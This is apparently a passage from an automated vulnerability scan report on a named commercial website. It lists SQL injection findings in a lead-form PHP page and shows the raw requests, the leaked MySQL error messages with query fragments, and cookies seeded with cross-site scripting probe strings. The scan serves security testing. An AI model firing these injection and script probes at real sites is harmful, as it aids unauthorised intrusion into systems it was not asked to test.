User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:01:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9n22gdv54tgseofd9ps6r0n9m5; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.299. http://www.insideup.com/ppc/leadflow/fist00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&1'=1 HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:24:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hb52heg70dp8nlovmccjjr4oq7; path=/
Content-Length: 2254
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc&1'=1' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&1''=1 HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:24:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=anefsq2b5objsn8bcq5i8j2nv2; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.300. http://www.insideup.com/ppc/leadflow/fist00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:01:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=uelg5ov2bh93d6cu2btl700hq5; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
